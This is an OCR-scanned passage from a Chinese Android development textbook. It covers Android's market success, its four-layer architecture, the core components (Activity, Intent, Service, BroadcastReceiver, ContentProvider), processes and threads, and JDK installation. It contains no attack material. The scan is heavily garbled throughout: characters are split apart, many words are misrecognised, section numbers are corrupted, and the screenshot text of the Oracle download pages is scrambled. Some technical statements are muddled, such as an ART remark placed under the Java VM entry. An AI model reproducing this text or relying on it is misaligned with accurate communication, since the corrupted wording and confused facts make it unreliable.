可 惜 Android 版 本 数量 较 多 ， 市 面 上 同时 存在 着 1.6、2.0、2.1、2.2、2.3、4.4.2 等 各 种 版 本 的 Android 
系统 手机 ， 应 用 软件 对 各 版 本 系统 的 兼容 性 对 程序 开发 人 员 来 说 是 一 个 不 小 的 挑战 。 由 于 开发 门槛 低 ， 导 
致 应 用 数量 虽然 很 多 , 但 是 应 用 质量 参差 不 齐 , 甚至 出 现 不 少 恶意 软件 , 使 一 些 用 户 受到 损失 。 而且, Android 
没有 对 各 厂商 在 硬件 上 进行 限制 ， 导 致 一 些 用 户 在 低 端 机 型 上 体验 不 佳 。 另 外 ， 因 为 Android 的 应 用 主要 使 
用 Java 诸 言 开发 ， 其 运行 效率 和 硬件 消耗 一 直 是 其 他 手机 用 户 所 诉 病 的 地 方 。 
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12 分析 Android 成 功 的 秘诀 


Ё 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 1 章 \ 分 析 Android 成 功 的 秘诀 .avi 
Android 从 2007 年 诞生 ， 到 2014 年 占据 市 场 80% 左 右 的 份额 ， 为 什么 能 够 在 这 么 短 的 时 间 内 成 为 移动 
智能 设备 市 场 占有 率 的 第 一 名 ? 在 本 节 的 内 容 中 ， 将 从 4 个 方面 来 为 读者 解答 这 个 问题 。 


1.21. 强 有 力 的 业界 支持 


Android 系统 基于 Linux 内 核 ， 是 一 款 开源 的 手机 操作 系统 。 正 是 因为 如 此 ， 在 Android WIRI EA f 
之 后 , 各 大 手机 厂商 和 电信 部 门 纷纷 加 入 到 了 Android 联盟 当中 。Android 联盟 由 业界 内 的 世界 级 企业 组 成 ， 
主要 成 员 包 括 中 国 移动 、 摩 托 罗 拉 、 高 通 、T-Mobile、 三 星 、LG、HTC 等 在 内 的 30 多 家 技术 和 无 线 应 用 的 
领军 企业 。Android 通过 与 运营 商 、 设 备 制造 商 、 开 发 商 和 其 他 有 关 各 方 结 成 深层 次 的 合作 伙伴 关系 ， 和 希望 
借助 建立 标准 化 、 开 放 式 的 移动 电话 软件 平台 ， 在 移动 产业 内 形成 一 个 开放 式 的 生态 系统 。 


122 ”研发 阵容 强大 


Android 的 研发 队伍 阵容 强大 ， 包 括 摩托 罗拉 、Google、HTC (宏达电 子 ) 、PHILIPS、T-Mobile、 高 
通 、 魅 族 、 三 星 、LG 以 及 中 国 移动 在 内 的 34 家 企业 ， 这 些 企业 在 业界 内 堪 称 大 化， 都 将 基于 该 平台 开发 
手机 的 新 型 业务 ， 应 用 之 间 的 通用 性 和 互联 性 将 在 最 大 程度 上 得 到 保持 。 无 论 是 从 硬件 到 软件 ， 还 是 到 电 
信服 务 商 ，Android 从 一 开始 便 成 为 了 业界 内 的 宠儿 ， 被 当做 重点 培养 对 象 。 这 样 Android 系统 在 强大 的 开 
发 团队 的 培育 和 呵护 下 ， 最 终 功 成 名 就 ， 成 为 了 一 方 霸主 。 


123 为 开发 人 员 “ 精 心 定制 ” 


Google 公司 一 直 视 程序 员 为 前 进 动力 的 源泉 ， 为 了 提高 程序 员 们 的 开发 积极 性 ， 不 但 为 开发 人 员 提 供 
了 一 流 的 开发 装备 和 软件 服务 ， 而 且 还 提出 了 振奋 人 心 的 奖励 机 制 。 

(1) 保证 开发 人 员 可 以 迅速 转型 到 Android 应 用 开发 

Android 应 用 程序 是 通过 Java 语言 开发 的 ， 只 要 具备 Java 开发 基础 ， 就 能 很 快 上 手 并 掌握 。 作 为 单独 
的 Android 应 用 开发 , 对 Java 编程 门槛 的 要 求 并 不 高 , 即使 没有 编程 经 验 的 门外汉 , 也 可 以 在 突击 学 习 Java 
之 后 学 习 Android. 另外 , Android 完全 支持 2D、3D 和 数据 库 , 并 且 和 浏览 器 实现 了 集成 。 所 以 通过 Android 
平台 ， 程 序 员 可 以 迅速 、 高 效 地 开发 出 绚丽 多 彩 的 应 用 ， 例 如 常见 的 工具 、 管 理 、 互 联网 和 游戏 等 。 

(2) 定期 召开 奖金 丰厚 的 Android 大 赛 

为 了 吸引 更 多 的 用 户 使 用 Android FR, 谷歌 已 经 成 功 举办 了 奖金 为 数 千 万 美元 的 开发 者 竞赛 ,鼓励 开 
发 人 员 创建 出 创意 十 足 、 十 分 有 用 的 软件 。 这 种 大 赛 对 于 开发 人 员 来 说 ， 不 但 能 提高 自己 的 开发 水 平 ， 高 
额 的 奖金 也 是 学 员 们 学 习 的 动力 。 

(3) 开发 人 员 可 以 利用 自己 的 作品 赚钱 

为 了 能 让 Android 平台 吸引 更 多 的 关注 , 谷歌 提供 了 一 个 专门 下 载 Android 应 用 的 门店 : Android Market， 
地 址 是 https://play.google.com/store。 在 这 个 门店 中 允许 开发 人 员 发 布 应 用 程序 ， 也 允许 Android 用 户 下 载 自 
己 喜 欢 的 程序 。 作 为 开发 者 ， 需 要 申请 开发 者 账号 ， 申 请 后 才能 将 自己 的 程序 上 传 到 Android Market， 并 且 


e. 


可 以 对 自己 的 软件 进行 定价 。 只 要 开发 的 软件 程序 足够 吸引 人 ， 就 可 以 获得 很 好 的 金钱 回报 ， 实 现 了 程序 
员 学 习 和 赚钱 两 不 误 ， 所 以 吸引 了 更 多 开发 人 员 加 入 到 Android 大 军 中 来 。 


1.24 开源 


Android 是 一 款 开源 的 系统 ， 开 源 意味 着 对 开发 人 员 和 手机 厂商 是 完全 免费 使 用 的 ， 正 因此 激发 了 世界 
各 地 无 数 程序 员 的 热情 。 于 是 很 多 手机 厂商 都 纷纷 采用 Android 作为 自己 产品 的 系统 ,这 当然 也 包括 很 多 山 
寨 厂商 。 因 为 免费 所 以 降低 了 成 本 ， 提 高 了 利润 。 而 对 于 开发 人 员 来 说 ， 因 为 Android 被 众多 移动 设备 产品 
采用 ， 所 以 这 方面 的 人 才 也 变 得 愈 发 珍贵 。 
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Android 系统 是 一 个 移动 设备 的 开发 平台 ,其 软件 层次 结构 包括 操作 系统 (OS) 、 中 间 件 (MiddleWare) 
和 应 用 程序 (Application) 。 根 据 Android 的 软件 框图 ， 其 软件 层次 结构 自 下 而 上 分 为 以 下 4 层 。 

操作 系统 层 (OS) 。 

各 种 库 〈Libraries) 和 Android 运行 环境 (RunTime) 。 

应 用 程序 框架 (Application Framework) 。 

A MFE (Application) 。 

上 述 各 个 层 的 具体 结构 如 图 1-8 所 示 。 


图 1-8 Android 操作 系统 的 组 件 结构 图 
在 本 节 的 内 容 中 ， 将 详细 介绍 Android 操作 系统 的 基本 组 件 结构 方面 的 知识 。 


1 Android 系统 安全 和 反 编译 实 点 
1.3.1 底层 操作 系统 层 (OS) 


因为 Android 源 于 Linux， 使 用 了 Linux 内 核 ， 所 以 Android 使 用 Linux 2.6 作为 操作 系统 。Linux 2.6 是 

-种 标准 的 技术 ，Linux 也 是 一 个 开放 的 操作 系统 。Android 对 操作 系统 的 使 用 包括 核心 和 驱动 程序 两 部 分 ， 
Android 的 Linux 核心 为 标准 的 Linux 2.6 内 核 ，Android 更 多 的 是 需要 一 些 与 移动 设备 相关 的 驱动 程序 。 主 
要 的 驱动 如 下 所 示 。 
显示 驱动 (Display Driver) : 常用 的 基于 Linux 的 帧 缓冲 (Frame Buffer) 驱动 。 
Flash 内 存 驱动 (Flash Memory Driver) : 是 基于 MTD 的 Flash 驱 动 程序 。 
照相 机 驱动 (Camera Driver) : 常用 的 基于 Linux 的 V4L (Video for Linux) 驱动 。 
音频 驱动 (Audio Driver) : 常用 的 基于 ALSA (Advanced Linux Sound Architecture， 高 级 Linux 声 
音 体系 ) 的 驱动 。 
WiFi 驱 动 (WiFi Driver) : 基于 IEEE 802.11 标 准 的 驱动 程序 。 
键盘 驱动 (Keyboard Driver) : 作为 输入 设备 的 键盘 驱动 。 
蓝牙 驱动 (Bluetooth Driver) : 基于 IEEE 802.15.1 标 准 的 无 线 传输 技术 。 
BinderIPC 驱 动 : Android 一 个 特殊 的 驱动 程序 ， 具 有 单独 的 设备 节点 ， 提 供 进程 问 通信 的 功能 。 
Power Management (能源 管理 ) : 用 于 管理 电池 电量 等 信息 。 
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1.3.2 ”各 种 库 (Libraries) 和 Android 运行 环境 (RunTime) 


各 种 库 和 Android 运行 环境 层次 对 应 一 般 嵌 入 式 系统 ， 相 当 于 中 间 件 层次 。Android 的 本 层次 分 成 两 个 
部 分 ， 一 个 是 各 种 库 ， 另 一 个 是 Android 运行 环境 。 本 层 的 内 容 大 多 是 使 用 C 和 C++ 实现 的 ， 其 中 包含 了 
如 下 各 种 库 。 

O CH: C 语 言 的 标准 库 ， 也 是 系统 中 一 个 最 底层 的 库 ，C 库 通过 Linux 的 系统 调用 来 实现 。 

О 多 媒体 框架 (MediaFrameword) : 这 部 分 内 容 是 Android 多 媒体 的 核心 部 分 ， 基 于 PacketVideo〔 即 
PV) 的 OpenCORE， 从 功能 上 本 库 一 共 分 为 两 大 部 分 ， 一 个 部 分 是 音频 、 视 频 的 回放 (PlayBack) ， 
另 一 部 分 则 是 音 视频 的 记录 (Recorder) 。 

SGL: 2D 图 像 引擎 。 
SSL: 即 Secure Socket Layer， 位 于 TCP/IP 协 议 与 各 种 应 用 层 协 议 之 间 ， 为 数据 通信 提供 安全 支持 。 
OpenGL ES: 提供 了 对 3D 的 支持 。 
界面 管理 工具 (Surface Management) : 提供 了 对 管理 显示 子 系统 等 功能 。 
SQLite: 一 个 通用 的 嵌入 式 数 据 库 。 
WebKit: 网 络 浏览 器 的 核心 。 
FreeType: 位 图 和 矢量 字体 的 功能 。 
- 般 情况 下 ，Android 的 各 种 库 是 以 系统 中 间 件 的 形式 提供 的 ， 其 显著 特点 是 与 移动 设备 平台 的 应 用 密 
切 相关 。 另外, Android 的 运行 环境 主要 是 指 Dalvik (虚拟 机 ) 技术 。Dalvik 和 一 般 的 Java 虚拟 机 (Java VM) 
是 有 区 别 的 。 
口 Java 虚 拟 机 : 执行 的 是 Java 标 准 的 字 节 码 (Bytecode) 。 从 Android 5.0 开 始 ，ART 将 作为 应 用 程序 
的 默认 运行 环境 。 而 Java 虚 拟 机 只 是 作为 一 个 备 选项 ， 迟 早退 出 历史 舞台 。 
O Dalvik: 执行 的 是 Dalvik 可 执行 格式 〈.dex) 中 的 执行 文件 。 在 执行 过 程 中 ， 每 一 个 应 用 程序 即 一 
个 进程 Linux 的 一 个 Process) 。 二 者 最 大 的 区 别 在 于 Java VM 是 基于 栈 的 虚拟 机 〈Stack-based) ， 
而 Dalvik 是 基于 寄存 器 的 虚拟 机 CRegister-based) 。 显 然 ， 后 者 最 大 的 好 处 在 于 可 以 根据 硬件 实现 
更 大 的 优化 ， 这 更 适合 移动 设备 。 
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1.3.3 Application Framework (应 用 程序 框架 ) 


在 整个 Android 系统 中 ， 和 应 用 开发 最 相关 的 是 Application Framework， 在 这 一 层 ，Android 为 应 用 程 
序 层 的 开发 者 提供 了 各 种 功能 强大 的 APIs, 这 实际 上 是 一 个 应 用 程序 的 框架 。 由 于 上 层 的 应 用 程序 是 以 Java 
构建 的 ， 所 以 ， 在 本 层 提 供 了 程序 中 所 需要 的 各 种 控件 ， 例 如 ，Views〈 视 图 组 件 ) List R) 、Grid 
CHI). Text Box (文本 框 ) Button (按钮 ) ， 甚 至 还 有 一 个 嵌入 式 的 Web 浏览 器 。 

-个 基本 的 Android 应 用 程序 可 以 利用 应 用 程序 框架 中 的 以 下 5 个 部 分 。 
Activity: 活动 。 
Broadcast Intent Receiver: 广播 意图 接收 者 。 
Service: 服务 。 
Content Provider: 内 容 提供 者 。 
Intent and Intent Filter: 意图 和 意图 过 滤器 。 


1.3.4 ”顶层 应 用 程序 (Application) 


Android 的 应 用 程序 主要 是 用 户 界 面 CUser Interface) 方面 的 ， 本 层 通常 使 用 Java 语言 编写 ， 其 中 还 可 
以 包含 各 种 被 放置 在 res 目录 中 的 资源 文件 -Java 程序 和 相关 资源 在 经 过 编译 后 ,会 生成 一 个 APK B. Android 
本 身 提供 了 主屏 幕 (Home) . RRA (Contact) 、 电 话 (Phone) 、 浏 览 器 (Browers) 等 众多 的 核心 应 用 。 
同时 应 用 程序 的 开发 者 还 可 以 使 用 应 用 程序 框架 层 的 АРІ 实现 自己 的 程序 .这 也 是 Android 开源 的 巨大 潜力 
的 体现 。 
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14 核心 组 件 
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在 分 析 Android L 的 源码 之 前 ,很 有 必要 了 解 一 下 Android 应 用 程序 的 核心 组 件 功能 。 一 个 典型 的 Android 
应 用 程序 通常 由 5 个 组 件 组 成 ， 这 5 个 组 件 构成 了 Android 的 核心 功能 。 在 本 节 的 内 容 中 ， 将 详细 讲解 这 5 
大 组 件 的 基本 知识 。 


1.4.1 Activity 界面 


Activity 是 最 常用 的 一 个 组 件 。 程序 中 Activity 通常 的 表现 形式 是 一 个 单独 的 界面 (Screen) 。 每 个 Activity 
都 是 一 个 单独 的 类 , 它 扩展 实现 了 Activity 基础 类 .。 这 个 类 显示 为 一 个 由 Views 组 成 的 用 户 界面 并 响应 事件 。 
大 多 数 程序 有 多 个 Activity。 例 如 ， 一 个 文本 信息 程序 有 以 下 界面 : 显示 联系 人 列表 界面 、 写 信息 界面 、 查 
看 信息 界面 和 设置 界面 等 。 每 个 界面 都 是 一 个 Activity。 切 换 到 另 一 个 界面 就 是 载 入 一 个 新 的 Activity。 某 
些 情况 下 ， 一 个 Activity 可 能 会 给 前 一 个 Activity 返回 值 ， 例 如 ， 一 个 让 用 户 选 择 相片 的 Activity 会 把 选择 
到 的 相片 返回 给 其 调用 者 。 

打开 一 个 新 界面 后 ， 前 一 个 界面 就 被 暂停 ， 并 放 入 历史 栈 中 (界面 切换 历史 栈 ) 。 使 用 者 可 以 回溯 前 
面 已 经 打开 的 存放 在 历史 栈 中 的 界面 ， 也 可 以 从 历史 栈 中 删除 没有 价值 的 界面 。Android 在 历史 栈 中 保留 程 
序 运行 产生 的 所 有 界面 : 从 第 一 个 界面 ， 到 最 后 一 个 。 
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ОО Android AES fo RE SER 
1.4.2 Intent 和 Intent Filters 


Android 通过 一 个 专门 的 Intent 类 来 进行 界面 的 切换 。 Intent 描述 了 程序 想 做 什么 (Intent 的 意思 为 意图 、 
目的 、 意 向 ) 。Intent 类 还 有 一 个 相关 类 Intent Filter. Intent 来 请 求 做 什么 事情 ，Intent Filters 则 描述 了 一 个 
Activity (或 下 文 的 Intent Receiver) 能 处 理 什么 意图 。 显 示 某 人 联系 信息 的 Activity 使 用 了 一 个 Intent Filter， 
就 是 说 它 知道 如 何 处 理应 用 到 此 人 数据 的 View (视图 ) 操作 。Activities 在 文件 AndroidManifest.xml 中 使 用 
Intent Filters 

通过 解析 Intents 可 以 实现 Activity 的 切换 ， 可 以 使 用 startActivity(myIntent) 启 用 新 的 Activity. RBA 
考察 所 有 安装 程序 的 Intent Filters， 然 后 找到 与 myIntent 匹配 最 好 的 Intent Filters 所 对 应 的 Activity。 这 个 新 
Activity 能 够 接收 Intent 传 来 的 消息 ， 并 因此 被 启用 。 解 析 Intents 的 过 程 发 生 在 startActivity 被 实时 调用 时 ， 
这 样 做 有 如 下 两 个 好 处 。 

(1) Activities 仅 发 出 一 个 Intent 请 求 ， 便 能 重用 其 他 组 件 的 功能 。 
(2) Activities 可 以 随时 被 替换 为 有 等 价 Intent Filter 的 新 Activity. 


1.4.3 ”Service 服务 


Service 是 一 个 没有 UI 且 长 驻 系统 的 代码 ， 最 常见 的 例子 是 媒体 播放 器 从 播放 列表 中 播放 歌曲 。 在 媒体 
播放 器 程序 中 ， 可 能 有 一 个 或 多 个 Activity 让 用 户 选择 播放 的 歌曲 。 然 而 在 后 台 播放 歌曲 时 无 需 Activity 干 
涉 ， 因 为 用 户 希 望 在 音乐 播放 同时 能 够 切换 到 其 他 界面 。 既 然 这 样 ， 媒 体 播放 器 Activity 需要 通过 
Context.startService() 启 动 一 个 Service， 这 个 Service 在 后 台 运行 以 保持 继续 播放 音乐 。 在 媒体 播放 器 被 关闭 
之 前 ， 系 统 会 保持 音乐 后 台 播 放 Service 的 正常 运行 。 可 以 用 Context.bindService0 方 法 连接 到 一 个 Service 
Е СШ Service 未 运行 ， 连 接 后 还 会 启动 它 ) ， 连 接 后 就 可 以 通过 一 个 Service 提供 的 接口 与 Service 进行 
通话 。 对 音乐 Service 来 说 ， 提 供 了 暂停 和 重 放 等 功能 。 

1. 如 何 使 用 服务 

在 Android 系统 中 ， 有 如 下 两 种 使 用 Service 服务 的 方法 。 

(1) 通过 调用 Context.startService() 启 动 服 务 ， 调 用 Context.stoptService() 结 束 服务 ，startService() 可 以 
传递 参数 给 Service。 

(2) 通过 调用 ContextbindService0 启 动 ， 调 用 Context.unbindService() 结 束 ， 还 可 以 通过 ServiceConnection 
访问 Service。 二 者 可 以 混合 使 用 ， 例 如 ， 可 以 调用 startService0 再 调用 unbindService()。 


2. Service 的 生命 周期 


在 使 用 startService() 方 法 启动 服务 后 ， 即 使 调用 startService0 的 进程 结束 了 ，Service 仍然 存在 ， 直 到 有 
进程 调用 stopService() 或 Service 自己 灭亡 (stopSelf()) 为止。 

在 调用 bindService() 后 ，Service 就 和 调用 bindService() 的 进程 同 生 共 死 ， 也 就 是 说 当 调 用 bindService() 
的 进程 死 了 ， 那 么 它 绑 定 的 Service 也 要 跟着 被 结束 ， 当 然 期 间 也 可 以 调用 unbindService() 让 Service 结束 。 

当 混 合 使 用 上 述 两 种 方式 时 ， 例 如 ， 既 调用 了 startService0， 又 调用 了 bindService0， 那 么 只 有 调用 
stopService() 和 unbindService()， 这 个 Service 才 会 被 结束 。 


3. 进程 生命 周期 
在 Android 系统 中 ， 会 尝试 保留 那些 启动 了 的 或 者 绑 定 了 的 服务 进程 ， 具 体 规则 如 下 所 示 。 
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СТ) 如 果 该 服务 正在 进程 的 onCreate()、onStart() 或 者 onDestroy() 方 法 中 执行 时 ， 那 么 主 进程 将 会 成 为 
-个 前 台 进 程 ， 以 确保 此 代码 不 会 被 停止 。 

(2) 如 果 服 务 已 经 开始 ， 那 么 其 主 进程 的 重要 性 会 低 于 所 有 的 可 见 进程 ， 但 是 会 高 于 不 可 见 进程 。 由 
于 只 有 少数 儿 个 进程 是 用 户 可 见 的 ， 所 以 只 要 不 是 内 存 特别 低 ， 该 服务 就 不 会 停止。 

G) 如 果 有 多 个 客户 端 绑 定 了 服务 ， 只 要 客户 端 中 的 一 个 对 于 用 户 是 可 见 的 ， 就 可 以 认为 该 服务 可 见 。 


1.4.4 Broadcast Receiver 发 送 广播 


在 Android 系统 中 ，Broadcast Receiver 是 一 个 广播 接收 器 组 件 。 广播 接收 器 是 一 个 专注 于 接收 广播 通知 
信息 ， 并 做 出 对 应 处 理 的 组 件 。 很 多 广播 是 源 自 于 系统 代码 的 ， 例 如 ， 通 知 时 区 改变 、 电 池 电 量 低 、 拍 摄 
了 一 张 照片 或 者 用 户 改变 了 语言 选项 。 应 用 程序 也 可 以 进行 广播 ， 例 如 ， 通 知 其 他 应 用 程序 一 些 数据 下 载 
完成 并 处 于 可 用 状态 。 应 用 程序 可 以 拥有 任意 数量 的 广播 接收 器 以 对 所 有 它 感 兴趣 的 通知 信息 予以 响应 ， 
所 有 的 接收 器 均 继 承 自 BroadcastReceiver 基 类 。 

在 Android 系统 中 ，Broadcast Receiver 广播 接收 器 没有 用 户 界面 。 然 而 ， 它 们 可 以 启动 一 个 Activity 来 
响应 收 到 的 信息 , 或 者 用 NotificationManager 来 通知 用 户 。 通 知 可 以 用 很 多 种 方式 来 吸引 用 户 的 注意 力 一 一 
闪 动 背 灯 、 震 动 、 播 放声 音 等 。 一 般 来 说 是 在 状态 栏 上 放 一 个 持久 的 图 标 ， 用 户 可 以 打开 并 获取 消息 。 

Android 中 的 广播 事件 有 两 种 : 一 种 是 系统 广播 事件 ， 例 如 ，ACTION_BOOT_ COMPLETED (系统 启 
动 完 成 后 触发 ) 、ACTION_TIME_CHANGED (系统 时 间 改 变 时 触发 ) . ACTION BATTERY LOW (电量 
低 时 触发 ) 等 ， 另 外 一 种 是 自 定义 的 广播 事件 。 

在 Android 系统 中 ， 广 播 事 件 的 基本 流程 如 下 所 示 。 

(1) 注册 广播 事件 : 注册 方式 有 两 种 ， 一 种 是 静态 注册 ， 即 在 AndroidManifest.xml 文件 中 定义 ， 注 册 
的 广播 接收 器 必须 继承 BroadcastReceiver: 另 一 种 是 动态 注册 ， 是 在 程序 中 使 用 Context.registerReceiver 注 
册 ， 注 册 的 广播 接收 器 相当 于 一 个 匿名 类 。 两 种 方式 都 需要 Intent Filter, 

(2) 发 送 广播 事件 : 通过 Context.sendBroadcast 来 发 送 ， 由 Intent 来 传递 注册 时 用 到 的 Action, 

G) 接收 广播 事件 : 当 发 送 的 广播 被 接收 器 监听 到 后 ， 会 调用 其 onReceive() 方 法 ， 并 将 包含 消息 的 
Intent 对 象 传 给 该 方法 。onReceive0 中 代码 的 执行 时 间 不 要 超过 55, AI Android 会 弹出 超时 对 话 框 。 


1.4.5 用 Content Provider 存储 数据 


在 Android 系统 中 ， 应 用 程序 会 把 数据 存放 在 一 个 SQLite 数据 库 格式 文件 里 ， 或 者 存放 在 其 他 有 效 设 
备 中 。 如 果 想 让 其 他 程序 能 够 使 用 我 们 程序 中 的 数据 ， 此 时 Content Provider 就 很 有 用 了 。Content Provider 
是 一 个 实现 了 一 系列 标准 方法 的 类 ， 这 个 类 使 得 其 他 程序 能 存储 、 读 取 某 种 Content Provider 可 处 理 的 数据 。 


1.5 进程 和 线程 


Фа 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 1 章 \ 进 程 和 线程 .avi 

Android 系统 中 也 有 进程 和 线程 ， 代 表 当 前 系统 中 正在 运行 的 程序 。 当 第 一 次 运行 某 个 组 件 时 ，Android 
会 启动 一 个 进程 。 在 默认 情况 下 ， 所 有 的 组 件 和 程序 运行 在 这 个 进程 和 线程 中 ， 也 可 以 安排 组 件 在 其 他 的 
进程 或 者 线程 中 运行 。 在 本 节 的 内 容 中 ， 简 要 讲解 Android 进程 和 线程 的 基本 知识 。 
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1.5.4 什么 是 进程 


组 件 运行 的 进程 由 manifest file 控制 。 组 件 的 节点 一 般 都 包含 一 个 process 属性 ， 例 如 <activity>、 
<service>、<receiver> 和 <provider> 节 点 。 属 性 process 可 以 设置 组 件 运行 的 进程 ， 可 以 配置 组 件 在 一 个 独立 
进程 中 运行 ， 或 者 多 个 组 件 在 同一 个 进程 中 运行 ， 甚 至 可 以 多 个 程序 在 一 个 进程 中 运行 ， 当 然 前 提 是 这 些 
程序 共享 一 个 User ID 并 给 定 同样 的 权限 。 另 外 ，<application> 节 点 也 包含 了 process 属性 ， 用 来 设置 程序 
中 所 有 组 件 的 默认 进程 。 

当 较 常用 的 进程 无 法 获取 足够 内 存 时 ，Android 会 关闭 不 常用 的 进程 。 当 下 次 启动 程序 时 会 重新 启动 这 
些 进程 。 当 决定 哪个 进程 需要 被 关闭 时 ，Android 会 考虑 哪个 对 用 户 更 加 有 用 。 例 如 ，Android 会 倾向 于 关 
闭 一 个 在 界面 长 期 不 显示 的 进程 来 支持 一 个 经 常 显示 在 界面 中 的 进程 。 是 否 关 闭 一 个 进程 决定 于 组 件 在 进 
程 中 的 状态 。 


1.5.2 ”什么 是 线程 


当 用 户 界面 需要 很 快 对 用 户 进行 响应 ， 就 需要 将 一 些 费 时 的 操作 ， 如 网 络 连接 、 下 载 或 者 非常 占用 服 
务 器 时 间 的 操作 等 放 到 其 他 线程 。 也 就 是 说 ， 即 使 为 组 件 分 配 了 不 同 的 进程 ， 有 叶 候 也 需要 再 分 配 线程 。 

线程 是 通过 Java 的 标准 对 象 Thread 来 创建 的 ， 在 Android 中 提供 了 如 下 管理 线程 的 方法 。 

(1) Looper 在 线程 中 运行 一 个 消息 循环 。 

(2) Handler 传递 一 个 消息 。 

(3) HandlerThread 创建 一 个 带 有 消息 循环 的 线程 。 

(4) Android 让 一 个 应 用 程序 在 单独 的 线程 中 ， 指 导 它 创建 自己 的 线程 。 

(5) 所 有 应 用 程序 组 件 (Activity、service、broadcast receiver) 都 在 理想 的 主线 程 中 实例 化 。 

(6) 没有 一 个 组 件 应 该 执行 长 时 间或 是 阻塞 操作 〈 例 如 ， 网 络 呼叫 或 是 计算 循环 ) ， 当 被 系统 调用 时 ， 
这 将 中 断 所 有 在 该 进程 的 其 他 组 件 。 

CD) 可 以 创建 一 个 新 的 线程 来 执行 长 期 操作 。 


shes 搭建 Android 开发 环境 


Android 作为 一 项 新 兴 技 术 ， 在 进行 开发 前 首先 要 搭建 一 个 对 应 的 开发 环境 。Android 开发 包括 底层 开 
发 和 应 用 开发 ， 底 层 开发 大 多 数 是 指 和 硬件 相关 的 开发 ， 并 且 是 基于 Linux 环境 的 ， 例 如 开发 驱动 程序 。 应 
用 开发 是 指 开发 能 在 Android 系统 上 运行 的 程序 ， 例 如 游戏 、 地 图 等 程序 。 本 章 将 详细 讲解 搭建 Android 应 
用 开发 环境 的 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


2.1 准备 工作 


Ё 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 2 章 \ 准 备 工作 .avi 
Android SDK 是 开发 Android 应 用 程序 所 必须 具备 的 工具 ， 在 搭建 之 前 需要 先 确定 基于 Android 应 用 软 
件 所 需要 开发 环境 的 要 求 ， 具 体 如 表 2-1 所 示 。 


表 2-1 开发 系统 所 需 参 数 


项 H 版 本 要求 & x 
Windows XP 或 Vista Mac 
操作 系统 | OS X 10.4.8+Linux Ubuntu 选择 自己 最 熟悉 的 操作 系统 


Drapper 


E 
Eclipse3.3CEuropa), 3.4 (Ganymede) 
IDE Eclipse IDE+ADT ADT (Android Development Tools) | 选择 for Java Developer 
开发 插件 
ж» SE Development Кїї 5 或 6， 单独 的 JRE 是 不 可 以 的 ， 必 须要 有 
JDK Apache Ant Linux 和 Mac 上 使 用 Apache Ant IDK, 不 兼容 Gru Java 编译 器 (gd) 
1.6.5+，Windows 上 使 用 1.7+ 版 本 ! TAN £ 


Android 工具 是 由 多 个 开发 包 组 成 的 ， 具 体 说 明 如 下 。 

JDK: 可 以 到 网 址 http://java.sun.com/javase/downloads/index.jsp 下 载 。 

Eclipse (Europa) : 可 以 到 网 址 http://www.eclipse.org/downloads/ 下 载 Eclipse IDE for Java Developers o 
Android SDK: 可 以 到 网 址 http://developer.android.com 下 载 。 

还 有 对 应 的 开发 插件 。 


其 他 


oooo 


22 安装 JDK 


ER 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 2 章 \ 安 装 JDK.avi 
JDK (Java Development Kit) 是 整个 Java 的 核心 ， 包 括 了 Java 运行 环境 、Java 工具 和 Java 基础 的 类 库 。 
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JDK 是 开发 和 运行 Java 环境 的 基础 ， 当 用 户 要 对 Java 程序 进行 编译 时 ， 必 须 先 获得 对 应 操作 系统 的 JDK， 
否则 将 无 法 编译 Java 程序 。 在 安装 IDK 之 前 需要 先 获得 JDK， 获 得 JDK 的 操作 流程 如 下 所 示 。 
(1) 登录 Oracle 官方 网 站 ， 网 址 为 http://developers.sun.com/downloads/， 如 图 2-1 所 示 。 


Downloads Store Support Training | Partners About 
Databases Server and Storage Systems Popular Dos 
Database 11g Solaris ае le 
Database 119 Release 2 Linux and VM TAR pet 
Express Edition pasa Java for Your Computer 
MySQL ae JavaFX 
Berkeley DB = Oracle Solaris 
Instant Client Developer Tools MySQL 
Application Express БЕКЕ; Fusion Middleware 119 
pen JDeveloper and ADF Ep т 
Developer Tools for Visual Studio khas фра 
аа Enterprise Pack for Eclipse 
Fusion Middleware 11g 
(incl, WebLogic) Зубни = Free Open Source Software 
See А! 
JRocit Partner Demo Software 
soa Sure -— 
See А нме 
E-Business Sute, 
PeopleSoft, JD Edwards, 
Enterprise Management Siebel CRM 
Enterprise Manager Agie 
Application Testing Suite Autovue 
See Ай See Al 


图 2-1 Oracle 官方 下 载 页 面 


(2) 在 图 2-1 中 可 以 看 到 有 很 多 版 本 ， 在 此 选择 当前 最 新 的 版 本 Java 7， 下 载 页 面 如 图 2-2 所 示 。 


G) 在 图 2-2 中 单 击 IDK 下 方 的 Download 按钮 ， 在 弹出 的 新 界面 中 选择 将 要 下 载 的 JDK， 笔 者 在 此 
选择 的 是 Windows x86 版 本 ， 如 图 2-3 所 示 。 
Java SE Development Kit ] 
Java Platform, Standard Edition laws opment Kit Tu 
You must accept the Oracle Binary Code License Agreement for Java SE to download this 
Java SE7u1 JDK JRE инк 
This release includes many securiy ез. Leam ERF2TE 
more + C Accept License Agreement © Decline License Agreement 
"What Java Do Need?" You musthave a copy of JDK7 Docs УВЕ 7 Docs 
the JRE (Java Runtime Environment) on your = Installation * Installation. Product / File Description File Size. Download. 
system to run Java applications and applets. То" ааста 一 一 一 Linux x88 7727 MB Š jd-7ut-inuxiS05 rpm 
develop Java applications and applets, уои need 22109002 TECUM Linux 185 92.17 MB Š jdk-7ut-inuxi586 tar gz 
the JDK (Java Development Kit), which Includes ReadMe * ReadMe ‘Linux 164. 7791MB Š jdk-7u1-linux-x64 rpm 
the JRE. - ReleaseNotes = ReleaseNotes Linuxx64 90.57 MB Š jdk-7ut-linux-x64 tar.gz 
Solaris x86 15478 МВ Š jdk-Tu1-solaris-i586 tar Z 
Oracle License — * Oracle License Solaris x86 9475 МВ Š jdk-7u1-solaris-i586 tar gz 
Java SE + Jaa SE Solaris SPARC 157.81MB Š jdk-7u1-solaris-sparctarZ 
Products Products Solaris SPARC 99.48 MB Š Jdk-7u1-solaris-sparctar gz 
oM E Solaris SPARC 64-bit 1827 MB Š jdk-7ut-solaris-sparo tar Z 
7 Tha Pany E Solaris SPARC 64-bit 1237 МВ Š jdi-Tut-solaris-sparcyo tar gz 
Lenses кез Solaris x64 1458MB Š jdk-7u1-solanis-r64 tar Z 
* Certified System * Certified System Solaris x64 9.38 МВ Š jdi-7u1-solaris-x64 tar gz 
